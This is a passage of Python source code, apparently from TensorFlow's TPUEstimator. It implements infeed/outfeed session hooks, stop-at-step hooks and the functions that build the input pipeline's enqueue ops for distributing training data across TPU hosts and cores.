else:
for _ in queue_ctx.read_iteration_counts():
session.run(self._enqueue_ops)
logging.info('Infeed thread finished, shutting down.')
def _run_outfeed(self, queue_ctx, session):
logging.info('Starting outfeed thread controller.')
status_logger = PeriodicLogger(seconds=60)
with self._rendezvous.catch_errors(source='outfeed', session=session):
for count, steps in enumerate(queue_ctx.read_iteration_counts()):
for i in xrange(steps):
logging.debug('Outfeed dequeue for iteration (%d, %d)', count, i)
session.run(self._dequeue_ops)
status_logger.log('Outfeed finished for iteration (%d, %d)', count, i)
logging.info('Outfeed thread finished, shutting down.')
def _create_infeed_controller(self, name, target, args):
return _OpQueueContext(name=name, target=target, args=args)
def _assertCompilationSucceeded(self, result, coord):
proto = tpu_compilation_result.CompilationResultProto()
proto.ParseFromString(result)
if proto.status_error_message:
logging.error('Compilation failed: {}'.format(proto.status_error_message))
coord.request_stop()
else:
logging.info('Compilation succeeded')
def after_create_session(self, session, coord):
if self._should_initialize_tpu:
logging.info('Init TPU system')
start = time.time()
with ops.Graph().as_default():
with tf_session.Session(
self._master, config=self._session_config) as sess:
sess.run(
tpu.initialize_system(
job=self._master_job,
embedding_config=self._embedding_layer_config))
logging.info('Initialized TPU in %d seconds', time.time() - start)
session.run(self._init_ops,
options=config_pb2.RunOptions(timeout_in_ms=5 * 60 * 1000))
if os.environ.get('TPU_SPLIT_COMPILE_AND_EXECUTE', '') == '1':
logging.info('Compiling user program: this may take a while...')
self._assertCompilationSucceeded(session.run(self._tpu_compile_op), coord)
self._infeed_controller = self._create_infeed_controller(
name='InfeedController', target=self._run_infeed, args=(session,))
self._outfeed_controller = _OpQueueContext(
name='OutfeedController', target=self._run_outfeed, args=(session,))
# Enable the worker watchdog to terminate workers on coordinator exit.
watchdog_timeout = int(os.environ.get('TF_TPU_WATCHDOG_TIMEOUT', '0'))
if watchdog_timeout > 0:
session_support.start_worker_watchdog(session,
shutdown_timeout=watchdog_timeout)
def before_run(self, run_context):
iterations = run_context.session.run(self._iterations_per_loop_var)
logging.info('Enqueue next (%d) batch(es) of data to infeed.', iterations)
self._infeed_controller.send_next_batch_signal(iterations)
logging.info('Dequeue next (%d) batch(es) of data from outfeed.',
iterations)
self._outfeed_controller.send_next_batch_signal(iterations)
def end(self, session):
logging.info('Stop infeed thread controller')
self._infeed_controller.join()
self._rendezvous.record_done('infeed')
logging.info('Stop output thread controller')
self._outfeed_controller.join()
self._rendezvous.record_done('outfeed')
logging.info('Shutdown TPU system.')
session.run(self._finalize_ops)
class TPUInfeedOutfeedSessionHookForPrediction(TPUInfeedOutfeedSessionHook):
def __init__(self, ctx, enqueue_ops, dequeue_ops, tpu_compile_op,
rendezvous=None, master=None, session_config=None):
super(TPUInfeedOutfeedSessionHookForPrediction, self).__init__(
ctx,
enqueue_ops,
dequeue_ops,
tpu_compile_op=tpu_compile_op,
run_infeed_loop_on_coordinator=False,
rendezvous=rendezvous,
master=master,
session_config=session_config)
def _create_infeed_controller(self, name, target, args):
return _OpSignalOnceQueueContext(name=name, target=target, args=args)
class _TPUStopAtStepHook(session_run_hook.SessionRunHook):
"""Hook that requests stop at a specified step.
This hook is similar to the `session_run_hook._StopAfterNEvalsHook` with
following differences for TPU training:
1. This hook sets the variable for iterations_per_loop, which is used by
`TPUInfeedOutfeedSessionHook` to control the iterations for infeed/outfeed.
As the hook execution order is not guaranteed, the variable update is
handled in `after_create_session` and `after_run` as
`TPUInfeedOutfeedSessionHook` reads the variable value in `before_run`.
2. For each training loop (session.run), the global step could be increased
multiple times on TPU. The global step tensor value will be explicitly read
again in `after_run` to ensure the latest value is retrieved to avoid a race
condition.
"""
def __init__(self, iterations, num_steps=None, last_step=None):
"""Initializes a `StopAtStepHook`.
Args:
iterations: The number of iterations to run optimizer per training loop.
num_steps: Number of steps to execute.
last_step: Step after which to stop.
Raises:
ValueError: If one of the arguments is invalid.
"""
if num_steps is None and last_step is None:
raise ValueError('One of num_steps or last_step must be specified.')
if num_steps is not None and last_step is not None:
raise ValueError('Only one of num_steps or last_step can be specified.')
self._num_steps = num_steps
self._last_step = last_step
self._iterations = iterations
def _next_iterations(self, global_step, last_step):
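    # Run at most `self._iterations` iterations per loop, but never schedule
    # more iterations than remain before `last_step`.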
gap = last_step - global_step
return min(gap, self._iterations)
def begin(self):
self._global_step_tensor = training_util.get_global_step()
if self._global_step_tensor is None:
raise RuntimeError('Global step should be created.')
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
global_step = session.run(self._global_step_tensor)
if self._last_step is None:
self._last_step = global_step + self._num_steps
iterations = self._next_iterations(global_step, self._last_step)
self._iterations_per_loop_var.load(iterations, session=session)
def after_run(self, run_context, run_values):
# Global step cannot be retrieved via SessionRunArgs and before_run due to
# race condition.
global_step = run_context.session.run(self._global_step_tensor)
if global_step >= self._last_step:
run_context.request_stop()
else:
iterations = self._next_iterations(global_step, self._last_step)
self._iterations_per_loop_var.load(
iterations, session=run_context.session)
class _SetEvalIterationsHook(session_run_hook.SessionRunHook):
"""Hook that requests stop at a specified step."""
def __init__(self, num_steps):
"""Initializes a `_SetEvalIterationsHook`.
Args:
num_steps: Number of steps to execute.
"""
self._num_steps = num_steps
def begin(self):
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
self._iterations_per_loop_var.load(self._num_steps, session=session)
class _StoppingPredictHook(session_run_hook.SessionRunHook):
"""Hook that requests stop according to the stopping signal in prediction."""
def __init__(self, scalar_stopping_signal):
self._scalar_stopping_signal = scalar_stopping_signal
def begin(self):
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
    # This is not strictly necessary, as we do not run the infeed enqueue and
    # outfeed dequeue in side threads for the prediction model. But it makes
    # TPUInfeedOutfeedSessionHook print a nicer message.
self._iterations_per_loop_var.load(1, session=session)
def before_run(self, run_context):
return session_run_hook.SessionRunArgs(self._scalar_stopping_signal)
def after_run(self, run_context, run_values):
_ = run_context
scalar_stopping_signal = run_values.results
if _StopSignals.should_stop(scalar_stopping_signal):
# NOTE(xiejw): In prediction, stopping signals are inserted for each
# batch. And we append one more batch to signal the system it should stop.
# The data flow might look like
#
# batch 0: images, labels, stop = 0 (user provided)
# batch 1: images, labels, stop = 0 (user provided)
# ...
# batch 99: images, labels, stop = 0 (user provided)
# batch 100: images, labels, stop = 1 (TPUEstimator appended)
#
# where the final batch (id = 100) is appended by TPUEstimator, so we
# should drop it before returning the predictions to user.
      # To achieve that, we throw an OutOfRangeError in after_run. Once the
      # MonitoredSession sees this error in SessionRunHook.after_run, the
      # "current" prediction, i.e., the batch with id=100, will be discarded
      # immediately.
raise errors.OutOfRangeError(None, None, 'Stopped by stopping signal.')
def generate_per_core_enqueue_ops_fn_for_host(
ctx, input_fn, inputs_structure_recorder, host_device, host_id):
"""Generates infeed enqueue ops for per-core input_fn on a single host."""
captured_infeed_queue = _CapturedObject()
tpu_ordinal_function_impl = ctx.tpu_ordinal_function(host_id)
def enqueue_ops_fn():
"""A fn returns enqueue_ops."""
num_cores_per_host = ctx.num_of_cores_per_host
per_host_sharded_inputs = []
for core_ordinal in range(num_cores_per_host):
with ops.name_scope('ordinal_%d' % (core_ordinal)):
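        # The invocation index uniquely identifies this (host, core) call of
        # input_fn.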
user_context = tpu_context.TPUContext(
internal_ctx=ctx,
input_device=host_device,
invocation_index=host_id * ctx.num_of_cores_per_host + core_ordinal)
inputs = _Inputs.from_input_fn(input_fn(user_context))
if inputs.is_dataset:
raise TypeError(
'`input_fn` returning `Dataset` is not yet supported in '
              'per-Core input pipeline deployment. Please set '
'TPUConfig.per_host_input_for_training to True or return '
'`features` and `labels` from `input_fn`')
features, labels = inputs.features_and_labels()
inputs_structure_recorder.validate_and_record_structure(
features, labels)
flattened_inputs = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels))
per_host_sharded_inputs.append(flattened_inputs)
infeed_queue = tpu_feed.InfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]))
captured_infeed_queue.capture(infeed_queue)
per_host_enqueue_ops = infeed_queue.generate_enqueue_ops(
per_host_sharded_inputs, tpu_ordinal_function=tpu_ordinal_function_impl)
return per_host_enqueue_ops
return enqueue_ops_fn, captured_infeed_queue
def generate_per_host_enqueue_ops_fn_for_host(
ctx, input_fn, inputs_structure_recorder, batch_axis, device, host_id):
"""Generates infeed enqueue ops for per-host input_fn on a single host."""
captured_infeed_queue = _CapturedObject()
dataset_initializer = None
with ops.device(device):
user_context = tpu_context.TPUContext(
internal_ctx=ctx, input_device=device, invocation_index=host_id)
inputs = _Inputs.from_input_fn(input_fn(user_context))
is_dataset = inputs.is_dataset
if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
if not is_dataset:
raise TypeError(
'For mode PREDICT, `input_fn` must return `Dataset` instead of '
'`features` and `labels`.')
if batch_axis is not None:
raise TypeError('For mode PREDICT, batch_axis is not supported yet.')
inputs = _InputsWithStoppingSignals(
dataset=inputs.dataset,
batch_size=ctx.batch_size_for_input_fn,
add_padding=True)
if is_dataset:
dataset_initializer = inputs.dataset_initializer()
tpu_ordinal_function_impl = ctx.tpu_ordinal_function(host_id)
def enqueue_ops_fn():
"""A Fn returning the TPU infeed enqueue ops.
    By providing this as a Fn, it can be invoked inside the tf.while_loop such
    that the input pipeline for multiple iterations can be executed by one
    Session.run call.
    Returns:
      A list of enqueue ops, or a dict of the enqueue ops and the stopping
      signals when signals are present.
"""
with ops.device(device):
num_of_replicas_per_host = ctx.num_of_replicas_per_host
# Convert user input to features and labels. If the user returns a
# dataset, it is initialized and the features and labels extracted via
# `dataset.iterator.get_next()`
features, labels = inputs.features_and_labels()
signals = inputs.signals()
inputs_structure_recorder.validate_and_record_structure(features, labels)
unsharded_tensor_list = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels, signals))
infeed_queue = tpu_feed.InfeedQueue(
tuple_types=[t.dtype for t in unsharded_tensor_list],
tuple_shapes=[t.shape for t in unsharded_tensor_list],
shard_dimensions=batch_axis)
captured_infeed_queue.capture(infeed_queue)
infeed_queue.set_number_of_shards(num_of_replicas_per_host)
per_host_enqueue_ops = (
infeed_queue.split_inputs_and_generate_enqueue_ops(
unsharded_tensor_list,
placement_function=lambda x: device,
tpu_ordinal_function=tpu_ordinal_function_impl))
if signals is None:
return per_host_enqueue_ops
else:
return {
'ops': per_host_enqueue_ops,
'signals': signals,
}
return enqueue_ops_fn, captured_infeed_queue, dataset_initializer
def generate_per_host_v2_enqueue_ops_fn_for_host(
ctx, input_fn, inputs_structure_recorder, device, host_id):
"""Generates infeed enqueue ops for per-host input_fn on a single host."""
captured_infeed_queue = _CapturedObject()
dataset_initializer = None
with ops.device(device):
user_context = tpu_context.TPUContext(
internal_ctx=ctx, input_device=device, invocation_index=host_id)
inputs = _Inputs.from_input_fn(input_fn(user_context))
is_dataset = inputs.is_dataset
if not is_dataset:
raise TypeError('`input_fn` must return a `Dataset` for the PER_HOST_V2 '
'input pipeline configuration.')
if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
inputs = _InputsWithStoppingSignals(
dataset=inputs.dataset,
batch_size=ctx.batch_size_for_input_fn,
add_padding=True,
num_invocations_per_step=ctx.num_of_replicas_per_host)
dataset_initializer = inputs.dataset_initializer()
tpu_ordinal_function_impl = ctx.tpu_ordinal_function(host_id)
def enqueue_ops_fn():
"""Generates the per_host enqueue ops."""
control_deps = []
per_host_sharded_inputs = []
enqueue_datas_list = []
num_replicas_per_host = ctx.num_of_replicas_per_host
cached_signals = None
with ops.device(device):
if not inputs.is_dataset:
raise TypeError('`input_fn` must return a `Dataset` for this mode.')
for _ in range(num_replicas_per_host):
# Use control dependencies to ensure a deterministic ordering.
with ops.control_dependencies(control_deps):
features, labels = inputs.features_and_labels() # Calls get_next()
signals = inputs.signals()
          # All the replicas share replica 0's stopping signal.
          # This avoids inconsistent state among different model replicas.
if cached_signals:
signals['stopping'] = cached_signals['stopping']
else:
cached_signals = signals
features, labels, enqueue_data = (
_tpu_estimator_embedding.split_inputs(ctx, features, labels))
enqueue_datas_list.append(enqueue_data)
inputs_structure_recorder.validate_and_record_structure(
features, labels)
flattened_inputs = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels, signals))
control_deps.extend(flattened_inputs)
per_host_sharded_inputs.append(flattened_inputs)
if inputs_structure_recorder.flattened_input_dims:
input_partition_dims = inputs_structure_recorder.flattened_input_dims
if signals:
input_partition_dims += [None] * len(signals)
# pylint: disable=protected-access
infeed_queue = tpu_feed._PartitionedInfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]),
host_id=host_id,
input_partition_dims=input_partition_dims,
device_assignment=ctx.device_assignment)
per_host_enqueue_ops = infeed_queue.generate_enqueue_ops(
per_host_sharded_inputs)
else:
infeed_queue = tpu_feed.InfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]))
per_host_enqueue_ops = infeed_queue.generate_enqueue_ops(
per_host_sharded_inputs,
tpu_ordinal_function=tpu_ordinal_function_impl)
captured_infeed_queue.capture(infeed_queue)
if ctx.embedding_config:
per_host_enqueue_ops.extend(
ctx.embedding_config.tpu_embedding.generate_enqueue_ops(
enqueue_datas_list))
if signals is None:
return per_host_enqueue_ops
else:
return {
'ops': per_host_enqueue_ops,
'signals': signals,
}
return enqueue_ops_fn, captured_infeed_queue, dataset_initializer
def generate_broadcast_enqueue_ops_fn(ctx, input_fn, inputs_structure_recorder,
num_hosts):
"""Generates infeed enqueue ops for one input_fn on all the hosts."""
captured_infeed_queue = _CapturedObject()
dataset_initializer = None
device_0 = ctx.tpu_host_placement_function(host_id=0)
with ops.device(device_0):
user_context = tpu_context.TPUContext(
internal_ctx=ctx, input_device=device_0, invocation_index=0)
inputs = _Inputs.from_input_fn(input_fn(user_context))
is_dataset = inputs.is_dataset
if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
if not is_dataset:
raise TypeError(
'For mode PREDICT, `input_fn` must return `Dataset` instead of '
'`features` and `labels`.')
inputs = _InputsWithStoppingSignals(
dataset=inputs.dataset,
batch_size=ctx.batch_size_for_input_fn,
add_padding=True)
if is_dataset:
dataset_initializer = inputs.dataset_initializer()
num_replicas_per_host = ctx.num_of_replicas_per_host
def tpu_ordinal_function_impl(replica_id):
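    # Prefer the explicit device assignment when one is configured; otherwise
    # map replicas to local TPU cores round-robin.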
if ctx.device_assignment:
return ctx.device_assignment.tpu_ordinal(replica=replica_id)
else:
return replica_id % num_replicas_per_host
def device_function_impl(replica_id):
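    # Returns the host device on which this replica's enqueue ops are placed.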
return ctx.tpu_host_placement_function(replica_id=replica_id)
def enqueue_ops_fn():
"""Generates enqueue ops for all the hosts."""
broadcasted_inputs = []
flattened_inputs = None # Cache result from input_fn.
signals = None
num_replicas = ctx.num_replicas
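    # core_id tracks which input slice feeds the next core when the SLICED
    # eval/training input configuration is used; it is unused otherwise.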
core_id = 0
for host_id in xrange(num_hosts):
with ops.device(ctx.tpu_host_placement_function(host_id=host_id)):
for _ in xrange(ctx.num_of_replicas_per_host):
# Note: input_fn is only called once at host 0 for the first replica.
# The features and labels returned from that invocation are
          # broadcasted to other replicas (including the replicas on other
# hosts).
if flattened_inputs is None:
features, labels = inputs.features_and_labels() # Calls get_next()
signals = inputs.signals()
inputs_structure_recorder.validate_and_record_structure(
features, labels)
flattened_inputs = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels, signals))
if (ctx.config.tpu_config.eval_training_input_configuration is
tpu_config.InputPipelineConfig.SLICED):
input_slices = [
array_ops.split(x, num_replicas) for x in flattened_inputs
]
if (ctx.config.tpu_config.eval_training_input_configuration is
tpu_config.InputPipelineConfig.SLICED):
# for each core, slice out the flattened_inputs for each core.
broadcasted_inputs.append([x[core_id] for x in input_slices])
core_id += 1
else:
broadcasted_inputs.append(flattened_inputs)
infeed_queue = tpu_feed.InfeedQueue(
number_of_tuple_elements=len(broadcasted_inputs[0]))
captured_infeed_queue.capture(infeed_queue)
enqueue_ops = infeed_queue.generate_enqueue_ops(
broadcasted_inputs,
tpu_ordinal_function=tpu_ordinal_function_impl,
placement_function=device_function_impl)
if signals is None:
return enqueue_ops
else:
return {
'ops': enqueue_ops,
'signals': signals,
}
return enqueue_ops_fn, captured_infeed_queue, dataset_initializer
class _InputPipeline(object):
"""`_InputPipeline` handles invoking `input_fn` and piping to infeed queue.
`_InputPipeline` abstracts the per-core/per-host `input_fn` invocation from
  the call site. To be precise, based on the configuration in
`_InternalTPUContext`, it invokes `input_fn` for all cores (usually
multi-host TPU training) or for one host (usually for single-host TPU
evaluation), and sends all `features` and `labels` returned by `input_fn` to
TPU infeed. For per-core invocation, `features` and `labels` are piped to
infeed directly, one tuple for each core. For per-host invocation, `features`
and `labels` are split at host (with respect to `batch_axis`) and piped to all
cores accordingly.
In addition, flatten/unflatten are handled by `_InputPipeline` also. Model
inputs returned by the `input_fn` can have one of the following forms:
1. features
2. (features, labels)
3. ((arbitrarily nested structure of features), labels)
Internally, form 1 is reformed to `(features, None)` as features and labels
  are passed separately to the underlying methods. For TPU training,
  TPUEstimator may expect multiple `features` and `labels` tuples, one for
  each core.
  TPUEstimator allows various different structures for inputs (namely
  `features` and `labels`). Both `features` and `labels` can be any nested
  structure supported by TF nest (namely, dicts, tuples, namedtuples, or any
  nested structure of these holding Tensors). `labels` could be `None` as
  well.
  These are flattened before they are passed to the infeed/outfeed library,
  which expects flattened lists.
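  A minimal sketch of that round trip, using the `InputsStructureRecorder`
  defined below (illustrative only):
  ```
  recorder = _InputPipeline.InputsStructureRecorder()
  recorder.validate_and_record_structure(features, labels)
  flat = recorder.flatten_features_and_labels(features, labels)
  # ... `flat` is what travels through the infeed/outfeed library ...
  inputs = recorder.unflatten_features_and_labels(flat)
  features, labels = inputs.features_and_labels()
  ```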
"""
class InputsStructureRecorder(object):
"""The recorder to record inputs structure."""
def __init__(self, input_partition_dims=None):
# Holds the structure of inputs
self._feature_structure = {}
self._flattened_input_dims = None
if input_partition_dims:
# This should have been validated in TPUConfig.
assert len(input_partition_dims) <= 2, 'must have 1 or 2 elements.'
if len(input_partition_dims) == 2:
self._feature_dims, self._label_dims = input_partition_dims
else:
self._feature_dims = input_partition_dims[0]
self._label_dims = None
assert self._feature_dims is not None, ('input_partition_dims[0] must '
'not be None')
else:
self._feature_dims = None
self._label_dims = None
# Internal state.
self._initialized = False
@property
def flattened_input_dims(self):
assert self._initialized, 'InputsStructureRecorder is not initialized.'
return self._flattened_input_dims
def has_labels(self):
return 'labels' in self._feature_structure
def _flatten_input_dims(self, feature_dims, feature_dims_names, label_dims,
label_dims_names, label_names, has_labels):
"""Flatten input dims with the same order as flattened input tensors."""
flattened_input_dims = []
if feature_dims_names:
# We need a fixed ordering for matching the tensors in features.
flattened_input_dims.extend(
[feature_dims[name] for name in feature_dims_names])
else:
flattened_input_dims.append(feature_dims)
if label_dims_names:
# We need a fixed ordering for matching the tensors in labels.
flattened_input_dims.extend(
[label_dims[name] for name in label_dims_names])
else:
if label_names:
num_tensors_in_label = len(label_names)
else:
num_tensors_in_label = int(has_labels)
# Setting `None` in input_partition_dims[1] will apply `None` to
# all the tensors in labels, regardless of internal structure.
flattened_input_dims.extend([label_dims] * num_tensors_in_label)
return flattened_input_dims
def validate_and_record_structure(self, features, labels):
"""Validates and records the structure of `features` and `labels`."""
# Extract structure.
has_labels = labels is not None
feature_names = _extract_key_names(features)
label_names = _extract_key_names(labels)
if not self._initialized:
# Record structure.
self._initialized = True
if self._feature_dims is not None:
feature_dims_names = _extract_key_names(self._feature_dims)
if feature_dims_names != feature_names:
raise ValueError(
'TPUConfig.input_partition_dims[0] mismatched feature'
' keys. Expected {}, got {}'.format(feature_names,
feature_dims_names))
label_dims_names = _extract_key_names(self._label_dims)
if self._label_dims is not None and label_dims_names != label_names:
raise ValueError(
'TPUConfig.input_partition_dims[1] mismatched label'
' keys. Expected {}, got {}'.format(label_names,
label_dims_names))
self._flattened_input_dims = self._flatten_input_dims(
self._feature_dims, feature_dims_names, self._label_dims,
label_dims_names, label_names, has_labels)
def flatten_features_and_labels(self, features, labels, signals=None):
"""Flattens the `features` and `labels` to a single tensor list."""
self._feature_structure['features'] = features
if labels is not None:
self._feature_structure['labels'] = labels
if signals is not None:
self._feature_structure['signals'] = signals
return data_nest.flatten(self._feature_structure)
def unflatten_features_and_labels(self, flattened_inputs):
"""Restores the flattened inputs to original features and labels form.
Args:
flattened_inputs: Flattened inputs for each shard.
Returns:
A tuple of (`features`, `labels`), where `labels` could be None.
Each one, if present, should have identical structure (single tensor vs
dict) as the one returned by input_fn.
Raises:
ValueError: If the number of expected tensors from `flattened_inputs`
mismatches the recorded structure.
"""
unflattened_inputs = data_nest.pack_sequence_as(self._feature_structure,
flattened_inputs)
return _Inputs(
unflattened_inputs['features'],
unflattened_inputs.get('labels'),
signals=unflattened_inputs.get('signals'))
def __init__(self, input_fn, batch_axis, ctx):
"""Constructor.
Args:
input_fn: input fn for train or eval.
batch_axis: A python tuple of int values describing how each tensor
produced by the Estimator `input_fn` should be split across the TPU
compute shards.
ctx: A `_InternalTPUContext` instance with mode.
Raises:
ValueError: If both `sharded_features` and `num_cores` are `None`.
"""
self._inputs_structure_recorder = _InputPipeline.InputsStructureRecorder(
ctx.input_partition_dims)
self._sharded_per_core = ctx.is_input_sharded_per_core()
self._input_fn = input_fn
self._infeed_queue = None
self._ctx = ctx
self._batch_axis = batch_axis
def generate_infeed_enqueue_ops_and_dequeue_fn(self):
"""Generates infeed enqueue ops and dequeue_fn."""
# While tf.while_loop is called, the body function, which invokes
# `enqueue_fn` passed in, is called to construct the graph. So, input_fn
# structure is recorded.
enqueue_ops, all_hooks, run_infeed_loop_on_coordinator = (
self._invoke_input_fn_and_record_structure())
self._validate_input_pipeline()
def dequeue_fn():
"""dequeue_fn is used by TPU to retrieve the tensors."""
# In the model-parallel case, both the host-side and device-side
# computations must agree on the core on which infeed takes place. We
# choose to perform infeed on logical core 0 of each replica.
values = self._infeed_queue.generate_dequeue_op(tpu_device=0)
# The unflatten process uses the structure information recorded above.
return self._inputs_structure_recorder.unflatten_features_and_labels(
values)
return (enqueue_ops, dequeue_fn, all_hooks, run_infeed_loop_on_coordinator)
def _invoke_input_fn_and_record_structure(self):
"""Deploys the input pipeline and record input structure."""
enqueue_ops = []
infeed_queues = []
all_dataset_initializers = []
num_hosts = self._ctx.num_hosts
tpu_host_placement_fn = self._ctx.tpu_host_placement_function
run_infeed_loop_on_coordinator = True
if self._sharded_per_core:
# Per-Core input pipeline deployment.
# Invoke input pipeline for each core and placed on the corresponding
# host.
for host_id in range(num_hosts):
host_device = tpu_host_placement_fn(host_id=host_id)
with ops.device(host_device):
with ops.name_scope('input_pipeline_task%d' % (host_id)):
enqueue_ops_fn, captured_infeed_queue = (
generate_per_core_enqueue_ops_fn_for_host(
self._ctx, self._input_fn, self._inputs_structure_recorder,
host_device, host_id))
if _WRAP_INPUT_FN_INTO_WHILE_LOOP:
run_infeed_loop_on_coordinator = False
enqueue_ops.append(
_wrap_computation_in_while_loop(
device=host_device, op_fn=enqueue_ops_fn))
else:
enqueue_ops.append(enqueue_ops_fn())
# Infeed_queue_getter must be called after enqueue_ops_fn is called.
infeed_queues.append(captured_infeed_queue.get())
elif self._ctx.is_input_broadcast_with_iterators():
      # Only calls input_fn on host 0.
host_device = tpu_host_placement_fn(host_id=0)
enqueue_ops_fn, captured_infeed_queue, dataset_initializer = (
generate_broadcast_enqueue_ops_fn(self._ctx, self._input_fn,
self._inputs_structure_recorder,
num_hosts))
if dataset_initializer:
all_dataset_initializers.append(dataset_initializer)
run_infeed_loop_on_coordinator = False
wrap_fn = (
_wrap_computation_in_while_loop
if self._ctx.mode != model_fn_lib.ModeKeys.PREDICT else
_wrap_computation_in_while_loop_with_stopping_signals)
enqueue_ops.append(wrap_fn(device=host_device, op_fn=enqueue_ops_fn))
else:
enqueue_ops.append(enqueue_ops_fn())
infeed_queues.append(captured_infeed_queue.get())
else:
for host_id in range(num_hosts):
host_device = tpu_host_placement_fn(host_id=host_id)
with ops.device(host_device):
with ops.name_scope('input_pipeline_task%d' % (host_id)):
if self._ctx.is_input_per_host_with_iterators():
enqueue_ops_fn, captured_infeed_queue, dataset_initializer = (
generate_per_host_v2_enqueue_ops_fn_for_host(
self._ctx, self._input_fn,
self._inputs_structure_recorder, host_device, host_id))
else:
enqueue_ops_fn, captured_infeed_queue, dataset_initializer = (
generate_per_host_enqueue_ops_fn_for_host(
self._ctx, self._input_fn,
self._inputs_structure_recorder, self._batch_axis,
host_device, host_id))
# NOTE(xiejw): We dispatch here based on the return type of the
# users `input_fn`.
#
# 1. If input_fn returns a Dataset instance, we initialize the
# iterator outside of tf.while_loop, and call the iterator.get_next
# inside tf.while_loop. This should be always safe.
#
# 2. If input_fn returns (features, labels), it is too late to wrap
# them inside tf.while_loop, as resource initialization cannot be
# handled in TF control flow properly. In this case, we will use
# python loop to enqueue the data into TPU system. This may be
# slow compared to the previous case.
if dataset_initializer:
all_dataset_initializers.append(dataset_initializer)
run_infeed_loop_on_coordinator = False
wrap_fn = (
_wrap_computation_in_while_loop
if self._ctx.mode != model_fn_lib.ModeKeys.PREDICT else
_wrap_computation_in_while_loop_with_stopping_signals)
enqueue_ops.append(
wrap_fn(device=host_device, op_fn=enqueue_ops_fn))
else:
enqueue_ops.append(enqueue_ops_fn())
infeed_queues.append(captured_infeed_queue.get())
    # infeed_queue is used to generate dequeue ops. The only thing it uses for
    # dequeue is dtypes and shapes. So, any one can be used. Here, grab the
    # first one.
self._infeed_queue = infeed_queues[0]
return enqueue_ops, [
util_lib.MultiHostDatasetInitializerHook(all_dataset_initializers)
], run_infeed_loop_on_coordinator
def _validate_input_pipeline(self):
"""Validates the input pipeline.
    Performs some sanity checks to log user-friendly information. Ideally we
    should error out to give users a better error message, but if
    _WRAP_INPUT_FN_INTO_WHILE_LOOP is False (legacy behavior), we cannot break
    user code, so we only log a warning.
Raises:
RuntimeError: If the validation failed.
"""
if ops.get_default_graph().get_collection(ops.GraphKeys.QUEUE_RUNNERS):
err_msg = ('Input pipeline contains one or more QueueRunners. '
'It could be slow and not scalable. Please consider '
'converting your input pipeline to use `tf.data` instead (see '
'https://www.tensorflow.org/guide/datasets for '
                 'instructions).')
if _WRAP_INPUT_FN_INTO_WHILE_LOOP:
raise RuntimeError(err_msg)
else:
logging.warn(err_msg)
def call_computation(computation,
experimental_export_device_assignment):
"""Call computation.
Args:
computation: A Python function that takes no inputs and builds computation
graph. If `computation` returns m outputs, this function will return a
list of m Tensors.
experimental_export_device_assignment: If `True`, use user-provided device
assignment. If `False`, round-robin computation among all TPU cores
visible to the host.
Returns:
A list of output tensors.
"""
if experimental_export_device_assignment:
return computation()
else:
# Using `TPUPartitionedCall` makes it possible to target a different
# TPU core with every `Session.run()` call. Note that the entire inference
# graph executes on a single core, and that invocations of this graph
# will round-robin among the cores attached to a host.
@function.Defun(capture_resource_var_by_value=False)
def tpu_subgraph():
return computation()
return tpu_functional.TPUPartitionedCall(
args=tpu_subgraph.captured_inputs,
device_ordinal=tpu_ops.tpu_ordinal_selector(),
Tout=[o.type for o in tpu_subgraph.definition.signature.output_arg],
f=tpu_subgraph)
class _ModelFnWrapper(object):
"""A `model_fn` wrapper.
  This makes calling model_fn on CPU and TPU easier and more consistent and
  performs the necessary checks and mutations required by TPU training and
  evaluation.
In addition, this wrapper manages converting the `model_fn` to a single TPU
train and eval step.
"""
def __init__(self, model_fn, config, params, ctx):
self._model_fn = model_fn
self._config = config
self._params = params
self._ctx = ctx
def call_without_tpu(self, features, labels, is_export_mode):
return self._call_model_fn(features, labels, is_export_mode=is_export_mode)
def _add_embedding_features(self, features, hook_dummy_table_variables):
"""Add embedding features, optionally add hook to intercept gradient."""
if self._ctx.embedding_config:
tpu_embedding_ = self._ctx.embedding_config.tpu_embedding
embedding_activations = tpu_embedding_.get_activations()
if hook_dummy_table_variables:
new_embedding_activations = (
tpu_embedding_gradient.hook_dummy_table_variables_to_activations(
tpu_embedding_, embedding_activations,
self._ctx.embedding_config.dummy_table_variables))
features.update(new_embedding_activations)
else:
features.update(embedding_activations)
def convert_to_single_tpu_train_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single train step on TPU.
The user provided `model_fn` takes input tuple
(features, labels) and produces the EstimatorSpec with train_op and loss for
train `mode`. This usually represents a single train computation on CPU.
For TPU training, a train (computation) step is first wrapped in a
tf.while_loop control flow to repeat for many times and then replicated to
    all TPU shards. Besides, the input should be taken from the TPU infeed
    rather than directly from the input pipeline (input_fn). To fit the TPU
    loop-and-replicate pattern, the original train computation should be
    reformed into the returned `train_step`.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
Returns:
      A tuple of train_fn, host_calls, captured scaffold_fn, and captured
      training hooks. The train_fn represents the train step for TPU.
"""
host_call = _OutfeedHostCall(self._ctx)
captured_scaffold_fn = _CapturedObject()
captured_training_hooks = _CapturedObject()
def train_step(loss):
"""Training step function for use inside a while loop."""
del loss # unused; required in function signature.
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
self._add_embedding_features(features, True)
estimator_spec = self._verify_estimator_spec(
self._call_model_fn(features, labels))
loss, train_op = estimator_spec.loss, estimator_spec.train_op
if isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
captured_scaffold_fn.capture(estimator_spec.scaffold_fn)
else:
captured_scaffold_fn.capture(None)
captured_training_hooks.capture(estimator_spec.training_hooks)
if self._ctx.embedding_config is None:
apply_sparse_grads = []
else:
tpu_embedding_ = self._ctx.embedding_config.tpu_embedding
gradients = (
tpu_embedding_gradient.get_gradients_through_dummy_table_variables(
tpu_embedding_)
)
